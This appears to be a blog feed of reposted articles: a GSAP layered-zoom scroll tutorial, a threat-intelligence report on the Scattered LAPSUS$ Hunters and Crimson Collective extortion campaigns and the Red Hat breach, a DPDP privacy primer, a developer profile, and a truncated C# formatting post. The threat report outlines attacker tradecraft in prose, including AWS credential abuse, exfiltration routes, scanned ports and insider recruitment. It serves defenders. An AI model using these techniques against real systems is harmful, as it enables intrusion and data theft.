Blog

  • Building a Layered Zoom Scroll Effect with GSAP ScrollSmoother and ScrollTrigger

    Building a Layered Zoom Scroll Effect with GSAP ScrollSmoother and ScrollTrigger



In my first tutorial, we rebuilt a grid experience from a nice website called Palmer, and I wrote that rebuilding existing interactions from scratch is an incredible way to learn. It trains your eye for detail, helps you grasp the underlying logic, and sharpens your creative problem-solving.

    Today, we’ll work on rebuilding a smooth scrolling animation from the Telescope website, originally created by Louis Paquet, Kim Levan, Adrien Vanderpotte, and Koki-Kiko. The goal, as always, is to understand how this kind of interaction works under the hood and to code the basics from scratch.

    In this tutorial, you’ll learn how to easily create and animate a deconstructed image grid and add a trailing zoom effect on a masked image between split text that moves apart, all based on smooth scrolling. We’ll be doing all this with GSAP, using its ScrollSmoother and ScrollTrigger plugins, which are now freely available to everyone 🎉.

    When developing interactive experiences, it helps to break things down into smaller parts. That way, each piece can be handled step by step without feeling overwhelming.

    Here’s the structure I followed for this effect:

    1. Floating image grid
    2. Main visual and split text
    3. Layered zoom and depth effect

    Let’s get started!



    Floating image grid

    The Markup

    Before starting the animation, we’ll begin with the basics. The layout might look deconstructed, but it needs to stay simple and predictable. For the structure itself, all we need to do is add a few images.

    <div class="section">
      <div class="section__images">
        <img src="./img-1.webp" alt="Image" />
        <img src="./img-2.webp" alt="Image" />
        <img src="./img-3.webp" alt="Image" />
        <img src="./img-4.webp" alt="Image" />
        <img src="./img-9.webp" alt="Image" />
        <img src="./img-6.webp" alt="Image" />
        <img src="./img-7.webp" alt="Image" />
        <img src="./img-8.webp" alt="Image" />
        <img src="./img-9.webp" alt="Image" />
        <img src="./img-10.webp" alt="Image" />
      </div>
    </div>

    The Style

    .section__images {
      position: absolute;
      top: 0;
      left: 0;
      width: 100vw;
      height: 100vh;
      perspective: 100vh;
    
      img {
        position: absolute;
        width: 10vw;
    
        @media (max-width: 768px) {
          width: 20vw;
        }
    
        &:nth-of-type(1) {
          top: 15vw;
          left: -3vw;
        }
    
        &:nth-of-type(2) {
          top: 5vw;
          left: 20vw;
        }
        
        /* same for all other images */
      }
    }

    When it comes to styling, there are a few important things to note. We set up a full-screen section that contains all the floating images.

    This section uses a perspective value to enable animations along the Z-axis, adding depth to the composition. Inside this section, each image is positioned absolutely to create an organic, scattered arrangement. By assigning their width in viewport units (vw), the images scale proportionally with the browser size, keeping the layout balanced across different screen resolutions.

    The Animation

    First, we’ll use the ScrollSmoother plugin to introduce a subtle scroll inertia, giving the scrolling experience a smoother and more refined feel. We’ll also enable the normalizeScroll option, since we initially ran into some performance inconsistencies that affected the smoothness of the animation.

    const scroller = ScrollSmoother.create({
      wrapper: ".wrapper",
      content: ".content",
      smooth: 1.5,
      effects: true,
      normalizeScroll: true
    })

    A single GSAP timeline is all we need to handle the entire animation. Let’s start by setting it up with the ScrollTrigger plugin.

    this.timeline = gsap.timeline({
      scrollTrigger: {
        trigger: this.dom,
        start: "top top",
        end: "bottom top",
        scrub: true,
        pin: true
      }
    })

    Next, we’ll animate the smaller images by moving them along the Z-axis. To make the motion feel more dynamic, we’ll add a stagger, introducing a small delay between each image so they don’t all animate at the same time.

    this.timeline.to(this.smallImages, {
      z: "100vh",
      duration: 1,
      ease: "power1.inOut",
      stagger: {
        amount: 0.2,
        from: "center"
      }
    })

    Main visual and split text

    Now that we’ve built the floating image grid, it’s time to focus on the centerpiece of the animation — the main image and the text that moves apart to reveal it. This part will bring the composition together and create that smooth, cinematic transition effect.

    <div class="section__media">
      <div class="section__media__back">
        <img src="./img-big.jpg" alt="Image" />
      </div>
    </div>

    Add the large image as a full-size cover using absolute positioning, and define a CSS variable --progress that we’ll use later to control the animation. This variable will make it easier to synchronize the scaling of the image with the motion of the text elements.

.section {
  --progress: 0;
}
    
    .section__media {
      position: absolute;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      z-index: -1;
    
      transform: scale(var(--progress));
    
      img {
          width: 100%;
          height: 100%;
          object-fit: cover;
      }
    }

    For the image animation, we’ll take a slightly different approach. Instead of animating the scale property directly with GSAP, we’ll animate a CSS variable called --progress throughout the timeline. This method keeps the code cleaner and allows for smoother synchronization with other visual elements, such as text or overlay effects.

    onUpdate: (self) => {
      const easedProgress = gsap.parseEase("power1.inOut")(self.progress)
      this.dom.style.setProperty("--progress", easedProgress)
    }
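For clarity, the callback simply lives inside the ScrollTrigger configuration we created earlier; this is just the two previous snippets combined:

this.timeline = gsap.timeline({
  scrollTrigger: {
    trigger: this.dom,
    start: "top top",
    end: "bottom top",
    scrub: true,
    pin: true,
    // Map the eased scroll progress onto the CSS variable
    onUpdate: (self) => {
      const easedProgress = gsap.parseEase("power1.inOut")(self.progress)
      this.dom.style.setProperty("--progress", easedProgress)
    }
  }
})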

    Animating a CSS variable like this gives you more flexibility, since the same variable can influence multiple properties at once. It’s a great technique for keeping complex animations both efficient and easy to tweak later.

    Next, we’ll add our text element, which is divided into two parts: one sliding to the left and the other moving to the right.

    <h1>
      <span class="left">for the</span>
      <span class="right">planet</span>
    </h1>

    Now we just need to use the --progress variable in our CSS to animate the two text parts on each side of the image. As the variable updates, both text elements will move apart in sync with the image scaling, creating a smooth and coordinated reveal effect.

    .left {
      transform: translate3d(calc(var(--progress) * (-66vw + 100%) - 0.5vw), 0, 0);
    }
    
    .right {
      transform: translate3d(calc(var(--progress) * (66vw - 100%)), 0, 0);
    }

    With this CSS in place, both halves of the text slide away from the center as the scroll progresses, perfectly matching the scaling of the image behind them. The result is a smooth, synchronized motion that feels natural and balanced, reinforcing the sense of depth and focus in the composition.

    Layered zoom and depth effect

    This effect feels fresh and cleverly designed, creating that nice “wow” moment without being overly complex to build. We’ll start by adding the “front” images to our structure, which are simple duplicates of the background image. These layers will help us create a trailing zoom effect that adds depth and motion to the final scene.

    <div class="section__media__front front-1">
      <img src="./img-big.jpg" alt="Image" />
    </div>
    <div class="section__media__front front-2">
      <img src="./img-big.jpg" alt="Image" />
    </div>
    <div class="section__media__front front-3">
      <img src="./img-big.jpg" alt="Image" />
    </div>
    <div class="section__media__front front-4">
      <img src="./img-big.jpg" alt="Image" />
    </div>
    <div class="section__media__front front-5">
      <img src="./img-big.jpg" alt="Image" />
    </div>
    <div class="section__media__front front-6">
      <img src="./img-big.jpg" alt="Image" />
    </div>

    Next, we’ll create and add a mask of the main subject (in this case, a crab) to make it appear as if it’s popping out from the background. This mask will define the visible area of each front image, giving the illusion of depth and motion as the layers scale and blur during the animation.

    .section__media__front {          
      img {
        mask-image: url(./mask.png);
        mask-position: 50% 50%;
        mask-size: cover;
      }
    }

    Here we’re scaling each image layer progressively to create a sense of depth.
    The first element stays at its original size, while each following layer is slightly smaller to give the impression that they’re moving further into the background.

    .front-1 {
      transform: scale(1);
    }
    
    .front-2 {
      transform: scale(0.85);
    }
    
    .front-3 {
      transform: scale(0.6);
    }
    
    .front-4 {
      transform: scale(0.45);
    }
    
    .front-5 {
      transform: scale(0.3);
    }
    
    .front-6 {
      transform: scale(0.15);
    }

    And finally, we just need to add one more step to our timeline to bring all the image layers back to their original scale (scale: 1). This final motion completes the trailing effect and smoothly transitions the focus toward the main visual. The scaling animation also helps tie the layered depth back together, making the composition feel cohesive and polished.

    this.timeline.to(this.frontImages, {
      scale: 1,
      duration: 1,
      ease: "power1.inOut",
      delay: .1,
    }, 0.4)

    To make the effect even more refined, we can add a subtle blur to each layer at the start and then animate it away as the timeline plays. This creates a soft, atmospheric look that enhances the perception of motion and depth. As the blur fades, the scene gradually becomes sharper, drawing the viewer’s attention toward the subject in a natural, cinematic way.

    .section__media__front {   
      filter: blur(2px);
}

this.timeline.to(this.frontImages, {
      duration: 1,
      filter: "blur(0px)",
      ease: "power1.inOut",
      delay: .4,
      stagger: {
        amount: 0.2,
        from: "end"
      }
    }, 0.6)

    With the scaling and blur animations combined, the layered zoom effect feels rich and immersive. Each layer moves in harmony, giving the animation depth and fluidity while keeping the overall experience smooth and visually balanced.

    The result

    Here’s the final result in action. The combination of scaling, blur, and smooth scrolling creates a clean, layered motion that feels both natural and visually engaging. The subtle depth shift gives the impression of a 3D scene coming to life as you scroll, all built with just a few well-timed animations.

    Final thoughts

    I hope you’ve learned a few new things and picked up some useful tricks while following this tutorial. I’m always amazed by how powerful the GSAP library is and how it allows us to create advanced, polished animations with just a few lines of code.

    I highly recommend checking out the full Telescope website, which is truly a masterpiece filled with creative and inspiring effects that showcase what’s possible with thoughtful interaction design.

    Thanks for reading, and see you around 👋



    Source link

  • Anatomy of the Red Hat Intrusion: Crimson Collective and SLSH Extortions

    Anatomy of the Red Hat Intrusion: Crimson Collective and SLSH Extortions


    Introduction

    In August 2025, a Telegram channel named “Scattered LAPSUS$ Hunters” surfaced, linking itself to notorious cybercrime groups: Scattered Spider, ShinyHunters, and LAPSUS$. The group quickly began posting stolen data, ransom demands, and provocative statements, reviving chaos once driven by LAPSUS$.  Its name hints at connections to “The Com”, an underground network where actors often share tools and identities, making attribution complex. As covered in our earlier blog on the Google-Salesforce breach, such overlaps are common among clusters like UNC3944 (Scattered Spider), UNC5537 and UNC6040.

    Overview of the larger collective – Attack Flow Diagram

     

    The Scattered LAPSUS$ Shiny Hunters (SLSH) group reportedly shared exploit code for CVE-2025-61882, a critical zero-day flaw in Oracle’s E-Business Suite that allows unauthenticated remote code execution. Oracle confirmed the issue and released an emergency patch after Mandiant revealed that the Clop ransomware group had exploited the flaw in August 2025 to steal data and conduct ransom campaigns. In September, hackers linked to SLSH breached a third-party provider for Discord, exposing limited user data, including payment details and IDs, and demanded ransom to prevent leaks. Evidence suggested access to Discord’s admin systems via a Zendesk compromise. Researchers believe ShinyHunters operates an Extortion-as-a-Service (EaaS) model, partnering with other hackers for ransom operations, an idea reinforced by other breaches. On October 11, SLSH announced plans to publicly launch its EaaS platform.

    Threat Landscape

    Recent posts threaten to leak Salesforce-related data if ransoms are unpaid by October 10 and hint at further attacks linked to the Salesloft ecosystem. Investigations indicate that the group relies heavily on vishing-based social engineering, convincing employees to install fake Salesforce Data Loader apps or approve malicious connected apps to gain access. These incidents underscore that the real weakness lies not in software flaws but in human manipulation, a persistent hallmark of this evolving threat landscape. Salesforce has publicly stated it will not comply with ransom demands made by the Scattered LAPSUS$ Hunters (SLH) group.

    Shortly after this stance became public, a malware-laced message titled “Shiny hunters” was sent to KrebsOnSecurity, containing physical threats and a malicious link hosted on limewire[.]com. Similar threatening emails targeted Mandiant and several other security firms.

    Email sent by ShinyHunters

     

    The link masqueraded as a screenshot file that secretly dropped a Remote Access Trojan (RAT), capable of surveillance, credential theft, and keylogging, without the victim opening the file. Mandiant later identified the malware as AsyncRAT, a .NET-based RAT widely used in cybercrime operations. Its plugin-based design allows attackers to quietly run malicious tools, capture screenshots, log keystrokes, and mine cryptocurrency.

    AsyncRAT Sample

     

    Such intimidation tactics are consistent with past SLH behavior, where members targeted researchers and law enforcement investigating their campaigns. Meanwhile, law enforcement pressure is mounting. In late September, two suspected Scattered Spider members were arrested in the UK for stealing and extorting over $115 million through similar operations.

Despite multiple arrests over the years, these groups or their rebrands remain active and increasingly bold. They claim to operate a new ransomware service, “SHINYSP1D3R”, and sell exploits, though most of these claims remain unverified. Many alleged victims match past UNC5537 and UNC6040 targets, suggesting continuity rather than a new actor.

    Oracle Zero-Day Exploitation

The Scattered LAPSUS$ Shiny Hunters (SLSH) group also appears to have shared exploit code for CVE-2025-61882, a critical zero-day in Oracle’s E-Business Suite allowing unauthenticated remote code execution, i.e., it may be exploited over a network without the need for a username and password.

Oracle has verified the issue and released an emergency patch, urging customers to update immediately. Mandiant’s Charles Carmakal confirmed that the Clop ransomware group first exploited this flaw in August 2025 to steal data from Oracle servers and initiate ransom campaigns.

    Exploit activity targeting Oracle EBS servers was observed as early as July 2025, prior to the release of official patches. Some of the exploit artifacts reportedly overlap with an exploit shared in the SLSH Telegram channel on October 3, 2025. However, GTIG (Google Threat Intelligence Group) notes that there is insufficient evidence to conclusively attribute the core intrusion to SLH or “Shiny Hunters” (UNC6240).

    Red Hat and Discord Breach

    On September 20, hackers breached a third-party support provider used by Discord, stealing user identities, payment info, and government-issued IDs from a limited number of users who interacted with customer support or Trust & Safety.

The attackers, allegedly tied to the Scattered LAPSUS$ Hunters (SLH), demanded a ransom to prevent data leaks. Leaked images showed access lists connected to Discord’s admin systems, reportedly tied to a Zendesk compromise.

    While Discord took immediate action, the full impact remains unclear, and the name of the vendor hasn’t been officially disclosed. Exposed data includes names, emails, billing info, IPs, and even passport/driver’s license photos.

    Security experts warn this leak could be a goldmine for tracing crypto scams, with Hudson Rock’s CTO noting: “This database could help solve major fraud cases.”

Discord stated that only around 70,000 government ID photos may have been exposed, rather than the 2.1 million the hackers claim. They also stated that Discord itself wasn’t breached and that, regardless of what the hackers claim, it won’t be paying out any ransom demands.

    Over recent weeks, a new threat group calling itself Crimson Collective has been observed targeting AWS cloud environments to steal sensitive data and extort victims — including a recent claim of breaching Red Hat’s private GitLab repositories. The group alleges it stole around 570 GB of data from nearly 28,000 internal repositories and approximately 800 Consulting Engagement Reports (CERs) as part of the attack. To support their claims, Crimson Collective shared a sample of the stolen data — including a tree structure of the compromised repositories — via their Telegram channel.


    First seen in September 2025 by Rapid7, the group uses TruffleHog, an open-source tool, to scan for leaked AWS credentials. Once access is gained, they create new users, escalate privileges, and exfiltrate databases, project repos, and EBS snapshots using native AWS services like S3 and RDS.
    They often deploy custom EC2 instances with permissive security groups, attach stolen volumes, and use Simple Email Service (SES) or external accounts to send extortion emails to victims. The group’s tactics show careful planning, high automation, and a focus on cloud-native abuse — all while leveraging valid credentials, not exploits.
    Although their exact structure remains unclear, the use of shared IPs and language in ransom notes suggests multiple actors are involved. Their focus appears to be data theft over encryption, aligning them more with modern extortion-as-a-service operations.
    (Source: Rapid7, Extortion note sent to the victim)

There is growing speculation that the Red Hat compromise may be linked to a recently disclosed vulnerability in Red Hat OpenShift AI, CVE-2025-10725 (CVSS 9.9). While no official attribution has been made, we observed that the sample data leaked by Scattered LAPSUS$ Shiny Hunters (SLSH) contained .config and .yml files referencing internal infrastructure details. This suggests that Crimson Collective may have exploited the vulnerability as part of their access or escalation strategy within the compromised environment. According to Red Hat, the flaw requires minimal authentication and allows a low-privileged user to escalate privileges and gain cluster administrator access, potentially compromising all workloads and data within the hybrid cloud environment.

    Compromised data pointing to Red Hat OpenShift

    This serious vulnerability threatens the confidentiality, integrity, and availability of the entire AI platform. OpenShift AI, Red Hat’s enterprise-grade solution for managing AI/ML workloads at scale, is widely used across industries and integrates tools like Jupyter notebooks, making the impact of such a flaw potentially far-reaching.

IP addresses linked to this activity by Rapid7 were primarily used for port scanning. Targeted ports are 9, 21, 80, 81, 82, 443, 3000, 3001, 4443, 5000, 5001, 7001, 8000, 8008, 8010, 8080, 8081, 8082, 8443, 8888, 9000, 9001, 9090, 9091, 9099. Activity from these IPs was observed between September 8 and 20.

    Later, researchers observed that Scattered Lapsus$ Shiny Hunters (SLSH) listed Red Hat on their leak site — indicating that SLSH is extorting Red Hat on behalf of Crimson Collective. Analysts now believe the Red Hat data breach is likely a collaborative operation between SLSH and Crimson Collective.

    (Source: Scattered Lapsus$ Hunters leak site)

An analysis of the file tree and data samples shared by Crimson Collective—and later referenced on the Scattered LAPSUS$ Hunters leak site—indicates that numerous organizations may be impacted by the Red Hat breach. The names of companies and environments included in the leaked repository structure suggest a wide operational footprint. While the actual file contents remain inaccessible, the naming conventions and structure provide insight into the possible reach of the compromise. Some of the sample CER data shared on the leak site revealed example configuration scripts (.cfg, .yml), example authentication tokens, sample network diagrams, and default passwords. Even when labelled as “examples”, these files could pose a risk to the customers who appear in those CER files if they come directly from production-like engagements.

It’s important to note that the following statistical chart is based solely on the directory tree and file names we observed in the leaked sample data structure. Since the underlying files or data were not accessible, we cannot say with complete certainty that all entries reflect active or legitimate systems; some entries may reflect outdated systems, internal testing, or incomplete deployments. However, the extensive listing—covering nearly five years of consulting activities—strongly suggests that a significant portion of this information may relate to real, deployed production environments across the listed organizations.

    Analysis based on the Red Hat leaked directory tree shows that BFSI happens to be the most affected sector (~29%), followed by technology (~17%) and government (~11%) sectors globally.

    For months, security researchers have suspected ShinyHunters of operating as an Extortion-as-a-Service (EaaS) group—partnering with other threat actors to extort victims and taking a cut of the ransom, much like a ransomware affiliate model. This theory gained traction after multiple breaches, including those at Oracle Cloud and PowerSchool, were extorted under the ShinyHunters name, despite the group not directly claiming the intrusions.

    In conversations with BleepingComputer, ShinyHunters admitted they often act as brokers for stolen data, typically receiving 25–30% of any extortion payment. With the launch of their public data leak site, they now appear to be offering this service openly.

    In addition to Red Hat, ShinyHunters is currently extorting S&P Global on behalf of another threat actor, who claimed responsibility for a February 2025 breach. While S&P previously denied any compromise, ShinyHunters has now released sample data and set an October 10 ransom deadline. When asked for comment, S&P Global declined, citing disclosure obligations as a U.S.-listed company.

    The Scattered LAPSUS$ Shiny Hunters posted an open recruitment message on their Telegram channel seeking insider access from employees at high‑revenue organizations — explicitly targeting sectors such as telecommunications (Claro, Telefónica, AT&T, etc.), large software and gaming firms (Microsoft, Apple, EA, IBM, etc.), call center/BPM providers (Atento, Teleperformance, etc.), and server hosts (OVH, Locaweb, etc.). The post makes clear they’re not after data (they claim to “have it all already”) but want persistent network entry — VPN/VDI/Citrix access, Active Directory capabilities, Okta/Azure/AWS privileged access — and offer payment for willing insiders. They encouraged uncertain candidates to DM them, said non‑employees with VPN/VDI access are also of interest, and noted a primary focus on targets in the US, AU, UK, CA, and FR. This brazen solicitation underlines their shift toward insider‑enabled intrusions to support extortion operations.


As of October 8, the SLSH group posted in their Telegram channel that they have in their possession a large KYC dataset pertaining to Indian citizens. No further evidence was shared, so the authenticity of this claim remains uncertain at the time of writing.

On October 11, Scattered LAPSUS$ Shiny Hunters (SLSH) disclosed intentions to launch a public EaaS offering. According to their statement, a portal and accompanying instructions will be made available. SLSH says the main advantage is that attackers can leverage the group’s name and reputation to increase effectiveness compared with anonymous attempts. Further information is expected. The group also published the full leaked datasets of “Qantas Airways Limited”, “Albertsons Companies, Inc.”, “GAP INC.”, “Fujifilm”, “Engie Resources” and “Vietnam Airlines” on their darknet site, likely after negotiations broke down or ransom demands were rejected.

    Contextualization

Seqrite Threat Intelligence (STI) offers complete correlation for these groups along with enrichment and context on victimology, TTPs, vulnerabilities, and more.

    Conclusion

    The rise of Scattered LAPSUS$ Hunters marks a new phase in cyber extortion, one driven by publicity, social engineering, and collaboration rather than pure technical skill. Their blending of tactics from LAPSUS$, ShinyHunters, and Scattered Spider reflects a broader shift toward loosely connected extortion alliances that thrive on chaos and visibility.

    The use of leaked exploits like the Oracle E-Business Suite zero-day shows how quickly threat actors can weaponize public tools to amplify impact. Attribution remains blurred as groups share infrastructure and code across open platforms. This campaign reinforces that people, not just systems, are the weakest link. The best defense now lies in strong access controls, multi-factor authentication, continuous threat monitoring, and user awareness. These hybrid attacks prove that modern cybercrime is as much about psychological pressure and reputation damage as it is about technical compromise.

    • Rotate all credentials and service accounts across Oracle, Discord, and third-party systems and follow Red Hat guidelines issued in the advisory.
    • Patch all systems immediately and isolate any unpatched servers.
    • Revoke and regenerate default auth tokens, API keys, session cookies, digital certificates (CER files) and private keys.
    • Audit and clean all configuration files to remove hardcoded credentials or tokens.
    • Implement continuous secret scanning in code and config repositories.
    • Restrict admin and service access using least-privilege and just-in-time models.
    • Enhance SIEM and EDR/XDR monitoring to detect credential or token misuse.
    • Assess and secure third-party vendors; require SOC 2 or ISO 27001 compliance.
    • Conduct a full data exposure analysis to confirm scope and impact of leaked data.
    • Rebuild or restore compromised systems from clean backups if integrity is uncertain.
    • Update the incident response plan to include leaked config, token, and certificate scenarios.
    • Notify affected users or partners and comply with disclosure regulations.
    • Enable continuous vulnerability scanning and scheduled credential/key rotation.
    • Monitor dark web sources for leaked configs, tokens, or certificates.
• Train employees to recognize phishing and credential-theft attempts, and how to avoid falling into the vishing trap.



    Source link

  • Building Trust with Data: Data Privacy Basics for Business Leaders

    Building Trust with Data: Data Privacy Basics for Business Leaders


    Introduction

In today’s digital-first economy, data has become the backbone of every business operation—from customer onboarding and marketing to employee management and vendor coordination. Every digital interaction generates data. But with this opportunity comes responsibility for how that data is collected, processed, and protected.

    For business leaders, especially in India, data privacy has moved from a compliance checkbox to a core business priority. The Digital Personal Data Protection (DPDP) Act, 2023, has made it mandatory for organisations to handle personal data responsibly—or face severe financial and reputational consequences.

    Consumers are also paying attention. Studies reveal that over 80% of Indian customers choose brands based on how well their personal data is protected. In other words, compliance builds trust, and trust builds business.

    Let’s explore data privacy fundamentals and why every leader needs to make it part of their business DNA.

    What is Data Privacy?

    Data privacy refers to the responsible collection, storage, and use of personal information in a way that respects an individual’s rights and choices. Personal data includes any information that can identify a person—such as name, phone number, Aadhaar or PAN, email address, health records, location, or behavioural insights like purchase patterns.

    Data privacy is about transparency and control—ensuring individuals know how their data is used and allowing them to manage or withdraw consent.

    When mishandled, data can become a liability. In 2024, the average cost of a data breach in India touched ₹19.5 crore, with phishing and stolen credentials emerging as leading causes. Beyond financial losses, such incidents can permanently erode customer confidence.

    Why is Data Privacy Important?

    1. Protecting individual rights

    Every person has the right to safeguard their personal information. Data exposure can lead to fraud, identity theft, and reputational harm. Ensuring privacy protection upholds ethical business standards and strengthens consumer confidence.

2. Building customer trust

    Trust is the new currency in digital business. Customers prefer companies that demonstrate accountability and transparency in data handling.
    In India, 82% of customers associate strong data protection with brand trust, even though 76% remain concerned about privacy on social platforms. This disconnect represents an opportunity for organisations to differentiate themselves by prioritising privacy as part of their value proposition.

3. Ensuring regulatory compliance

    The DPDP Act, 2023 has set a new benchmark for data governance in India. Non-compliance can lead to penalties of up to ₹250 crore. Adhering to privacy principles reduces legal risk and strengthens your organisation’s reputation as a responsible data custodian.

    Understanding the DPDP Act

    The Digital Personal Data Protection (DPDP) Act, 2023 establishes clear rules for how organisations collect, store, and process personal data in India. It applies to any entity offering goods or services to individuals in India, even if the processing occurs outside the country.

    Key provisions for business leaders include:

    • Informed Consent: Data must be collected only after obtaining precise, specific, and informed consent from the individual, with the option to withdraw it easily.
    • Transparent Notices: Businesses must provide concise, accessible privacy notices explaining what data is being collected, for what purpose, and how users can exercise their rights.
    • Data Principal Rights: Individuals can access, correct, delete, and raise grievances related to their data.
    • Accountability Measures: Organisations must implement technical and organisational safeguards and report data breaches to the Data Protection Board of India (DPBI) and affected individuals when required.

    Key Terms to Know:

    • Data Principal: The individual whose data is collected (customer, employee, etc.)
    • Data Fiduciary: The organisation that determines how personal data is processed
    • Consent: Freely given, informed permission from the Data Principal
    • Data Principal Rights: Rights to know, correct, erase, and raise complaints about data handling

    Why Business Leaders Should Care

    Every business—large or small—handles personal data. Whether it’s customer information, employee records, or vendor details, the onus of protecting that data lies with leadership.

    Failure to comply with privacy requirements can lead to:

    • Regulatory penalties and legal action
    • Loss of customer trust and brand credibility
    • Operational disruptions and financial impact from breaches

    Data privacy is not just an IT or legal issue—it’s a strategic leadership priority.

    Common Data Privacy Pitfalls

    Many Indian organisations are still evolving in terms of their privacy maturity. Common errors include:

    • Collecting unnecessary personal data
    • Failing to obtain valid, informed consent
    • Storing data without encryption or access controls
    • Sharing information with third parties without authorisation
    • Neglecting employee data protection

    Even small oversights can have large consequences. Proactively addressing these helps businesses avoid compliance risks and build stronger governance frameworks.

    How Businesses Can Strengthen Data Privacy

    Here’s a practical roadmap to embed privacy into your business operations:

    1. Map your data ecosystem
      Identify what personal data your organisation collects, where it’s stored, and who accesses it.
    2. Simplify consent management
      Ensure consent forms are precise, user-friendly, and compliant with DPDP requirements.
    3. Secure your data
      Apply encryption, multi-factor authentication, and strict access controls to protect sensitive data.
    4. Enforce access governance
      Limit data access to authorised personnel based on defined roles and responsibilities.
    5. Educate your workforce
      Conduct regular privacy and cybersecurity training to create a culture of accountability.
    6. Establish a transparent privacy policy
      Clearly communicate how data is collected, processed, and protected—and how users can exercise their rights.

    Conclusion

    In the digital economy, trust is a strategic differentiator. Data privacy is no longer just a compliance requirement—it’s an enabler of business resilience and customer loyalty.

    By embedding privacy into your business processes, you demonstrate respect for your stakeholders and align with global standards of responsible governance.

    If you’re beginning your data privacy journey, Seqrite Data Privacy offers a comprehensive, enterprise-grade platform designed for Indian businesses. It enables you to:

    • Discover and classify personal data across your organisation
    • Manage Data Principal Rights requests with ease
    • Automate compliance with DPDP, GDPR, HIPAA, and other global frameworks
    • Gain transparency with dashboards and role-based access controls

    With Seqrite Data Privacy, you build compliance into the core of your operations—strengthening trust, reducing risk, and positioning your business for long-term success.

    Build trust. Ensure compliance. Protect your business—with Seqrite.



    Source link

  • The Art of Play: Karim Maaloul’s World of Interactive Wonder

    The Art of Play: Karim Maaloul’s World of Interactive Wonder


    Karim Maaloul, Developer spotlight

Hi, I’m Karim, co-founder and Creative Director at EPIC Agency. I lead a team of talented designers and collaborate closely with skilled developers at EPIC to craft nice-looking, user-friendly websites.

    I’m closely involved in UX/UI design, from early prototyping to the design of full digital platforms.
    I also dedicate much of my time to crafting game concepts and 3D models for activation games and immersive experiences.

    By night, you’ll often find me coding games or experimenting with shaders, still chasing that spark of play and creativity that started it all.



    Highlighted projects

    The Cursed Library

    The Cursed Library is a passion project that blends my lifelong love for children’s books, classic tales, and dark, immersive atmospheres. I designed six unsettling worlds inspired by well-known stories, modeled entirely in Blender 3D.

    Powered by Three.js and custom shaders, the experience unfolds as a journey through a haunted library, where hidden portals transport visitors into different dimensions.

    Sound is at the heart of the experience. Every whisper, melody, and echo shapes the mood. The amazing Steve Jones and Jules Maxwell crafted the haunting soundtracks, recorded the voices, and coded the intricate audio transitions.

    Captain Goosebumps

    Every year at EPIC, we dedicate our time and expertise to support a cause that reflects our values. This year, we chose to raise awareness for Live in Color, a Belgian organization that promotes the inclusion of refugees through education.

    To do so, we created a playful web game featuring a skiing goose that brings color back to the world. While the core development was led by my colleague Théo Gil Cerqueira, I was responsible for the art direction, illustration, and shader coding of the trail.

    Red Bull Sand Scramble

    Red Bull is a client we collaborate with regularly. I’ve been involved in several game projects for them, but my favorite is Red Bull Sand Scramble, a fast-paced racing game where I developed a simple yet efficient physics engine, along with the 3D modeling and gameplay design.

    I worked closely with Shamil Altamirov who developed the interface, and my associate Thierry Michel, who coded the whole gameplay and transformed a rough prototype into an energetic, adrenaline-filled experience that perfectly captures the spirit of Red Bull.

    Tiny Experiments

    I’ve always had a soft spot for small-scale projects. I enjoy crafting bite-sized experiences that explore simple mechanics and techniques in playful ways. I spend a lot of time experimenting on CodePen, where I can focus on the tiny details and polish every interaction.

    Here are a few of those experiments.

See the Pen Skating bunny by Karim Maaloul (@Yakudoo) on CodePen.

    Skating Bunny is a small minimalist game I built as a playful reward for people who contact us through our website. It was a perfect excuse to experiment with the frame buffer technique used to draw the skate marks and to craft custom shaders for the smooth, blurred floor reflections.

See the Pen Infinite Portals by Karim Maaloul (@Yakudoo) on CodePen.

    Two worlds are interconnected, sharing the same camera view but existing in different spatial dimensions. This experiment is another take on the portal effects I previously explored in The Cursed Library.

See the Pen Chill the lion by Karim Maaloul (@Yakudoo) on CodePen.

Chill the Lion was the CodePen that got me the most attention. I made it during a heat wave, and somehow it went viral.

    It was also one of my very first experiments with Three.js, where I built a lion entirely out of cube primitives.

    Back then, I had no 3D modeling experience at all. Learning Blender 3D later on completely transformed how I design and bring interactive characters to life.

    About me

    I began my career nearly two decades ago as a children’s book illustrator before transitioning into web design. I then joined several agencies as a Flash developer, creating rich interactive experiences. When Flash met its end, I dove into Three.js, exploring new ways to bring interactivity to the web through 3D experiences and games.

    What I love most is blending my illustration, design, and coding skills to craft short, playful experiences.
    I enjoy infusing my own art direction into the code and constantly learning new techniques to better express my creative vision.

    These days, I’m most excited about Godot, an open-source, lightweight alternative to the big game engines.
    I’m also curious to see how AI will shape and expand the creative process.
    And of course, I’m still interested in Three.js, especially TSL, a node-based shading language that simplifies the creation of shaders.

    Karim and Wenzhu at work
    This is me, pretending to work very hard with my colleague Wenzhu.

    Tools

    I use Blender3D, Figma, Photoshop, and After Effects daily to shape the design of my experiences. On the coding side, I rely on Three.js, GSAP, and vanilla JavaScript to bring my characters to life.

    Lately, with the rise of AI, I’ve been experimenting with ComfyUI, Midjourney, and VEO3.

    Final Thoughts

    In the end, tools are just tools.
    I once saw a calligrapher write a stunningly beautiful word using only his finger and some coffee as ink. A perfect reminder that the greatest skill one can develop is a sharp eye and a rich, open-minded sense of curiosity.

    Codrops illustrates this idea by showing that there’s never a single way to achieve an effect.
    Mastering a technique broadens your skill set, but what truly matters is the ability to forge your own path.

    Thank you for reading this spotlight!



    Source link

  • How to use String.Format – and why you should care about it | Code4IT


    Is string.Format obsolete? Not at all, it still has cards to play! Let’s see how we can customize format and create custom formatters.


Formatting strings is one of the basic operations we do in our day-to-day job. We often create methods to provide specific formatting for our data, but we don’t always want to implement an additional method for every type of formatting we need; too many similar methods will clutter our code.

    Let’s say that you have this simple class:

class CapturedPokemon
{
      public string Name { get; set; }
      public int PokedexIndex { get; set; }
      public decimal Weight { get; set; }
      public decimal Height { get; set; }
      public DateTime CaptureDate { get; set; }
    }
    

    and an instance of that class:

    var pkm = new CapturedPokemon
    {
        Name = "Garchomp",
        PokedexIndex = 445,
        Height = 1.9m,
        Weight = 95.0m,
        CaptureDate = new DateTime(2020, 5, 6, 14, 55, 23)
    };
    

    How can we format the pkm variable to provide useful information on our UI?

    The most simple ways are using concatenation, formatting, or string interpolation.

    Differences between concatenation, formatting, and interpolation

    Concatenation is the simplest way: you concatenate strings with the + operator.

var messageWithConcatenation = "I caught a " + pkm.Name + " on " + pkm.CaptureDate.ToString("yyyy-MM-dd");
    

    There are 2 main downsides:

1. it’s hard to read and maintain, with all those opening and closing quotes
    2. it’s highly inefficient, since strings are immutable and, every time you concatenate a string, it creates a whole new string.

